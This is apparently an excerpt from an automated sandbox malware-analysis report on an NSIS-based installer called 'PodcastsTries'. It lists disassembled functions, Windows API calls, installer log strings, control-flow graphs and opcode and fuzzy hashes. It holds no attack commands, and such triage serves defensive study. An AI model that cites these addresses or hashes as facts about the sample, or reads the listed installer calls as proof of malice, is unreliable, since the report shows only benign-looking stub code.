                                                                                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                          Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                          • String ID: jF
                                                                                                                                                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                          Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                          Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                          Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
